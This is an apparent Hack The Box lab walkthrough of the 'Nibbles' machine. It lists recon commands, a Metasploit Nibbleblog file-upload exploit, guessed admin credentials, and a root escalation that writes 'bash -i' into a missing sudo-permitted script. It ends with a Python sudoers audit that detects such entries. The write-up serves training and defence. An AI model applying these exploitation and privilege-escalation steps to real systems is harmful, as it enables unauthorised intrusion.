Nibbles
HTB 6. Nibbles
1. Ports 22 and 80 are open from `nmap -A -T4 -p- 10.10.10.75`; typically 80 is the exploit path and 22 is used later. SSH is usually not the exploit.
2. `searchsploit apache 2.4`
3. Going to `10.10.10.75` shows only "Hello World".
4. Viewing the source shows `10.10.10.75/nibbleblog/`, which runs on the Nibbleblog platform.
5. `searchsploit nibble` finds Nibbleblog 4.0.3 arbitrary file upload and remote code execution.
6. In Metasploit, `use exploit/multi/http/nibbleblog_file_upload`; `info` shows we need to be authenticated.
7. `dirbuster` to find login pages.
8. Could potentially use Burp Suite to brute force usernames and passwords, or just brute force the password with admin as the username. Potentially use `cewl` on blog posts to create a password list.
9. Credentials are `admin:nibbles`, guessed from the site name.
10. Set parameters in Metasploit to the username, password, rhosts, and `targeturi=/nibbleblog`.
11. This works because of the `My Image` plugin, which allows any file to be uploaded (no whitelisting is done).
12. `sysinfo` shows 4.4.0 Ubuntu and `getuid` shows `nibbler (1001)`.
13. Searching for priv esc: `shell`, `cd /home/nibbler`, `ls -la`, `cat user.txt`, `history`, `cat .bash_history`, `sudo -l`.
14. `sudo -l` reveals `~/personal/stuff/monitor.sh` can be run as root without a password.
15. This folder does not exist, so we can create a shell script in that location.
16. `personal.zip` exists; potentially try to crack it.
17. `uname -a` prints the entire OS running; potentially search for exploits for the general OS.
18.
19. `echo "bash -i" > monitor.sh` and `chmod +x monitor.sh`
20. `sudo /home/nibbler/personal/stuff/monitor.sh`
21. `cat /root/root.txt`
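As an added defensive example (not from the original notes), a small sudoers audit that flags the kind of entry step 14 exposes: a NOPASSWD rule whose target sits under a user's home or does not exist yet, so the user can simply create it. The parser, the sample sudoers lines and the set of "existing" paths are constructed for illustration.

```python
import re

# Simplified sudoers user specification (hypothetical parser: no aliases,
# includes, or the full tag set):  <user> <host>=(<runas>) [NOPASSWD:] <cmd> [args]
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmd>.+)$"
)

# Constructed sample (not a real sudoers file): line 2 mirrors the entry that
# sudo -l revealed on this box; the other two are there for comparison.
SAMPLE_SUDOERS = """\
Defaults env_reset
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
ops     ALL=(ALL) /usr/local/sbin/backup.sh
"""

# Places where an unprivileged user can normally create files.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

def audit_sudoers(text, existing_paths):
    """Return [(user, command_path, [reasons])] for risky entries.
    existing_paths: absolute paths present on the audited host, passed in
    explicitly so the check runs offline against a captured file."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        cmd_path = m.group("cmd").split()[0]  # command without its arguments
        reasons = []
        if "NOPASSWD:" in m.group("tags"):
            reasons.append("NOPASSWD")
        if cmd_path == "ALL":
            reasons.append("any command allowed")
        else:
            if cmd_path.startswith(USER_WRITABLE_PREFIXES):
                reasons.append("path in user-writable location")
            if cmd_path not in existing_paths:
                reasons.append("target missing, user could create it")
        if reasons:
            findings.append((m.group("user"), cmd_path, reasons))
    return findings
```

Running it on a real host would pass `{p for p in candidate_paths if os.path.exists(p)}` as `existing_paths`; the monitor.sh entry is the only one that trips all three checks.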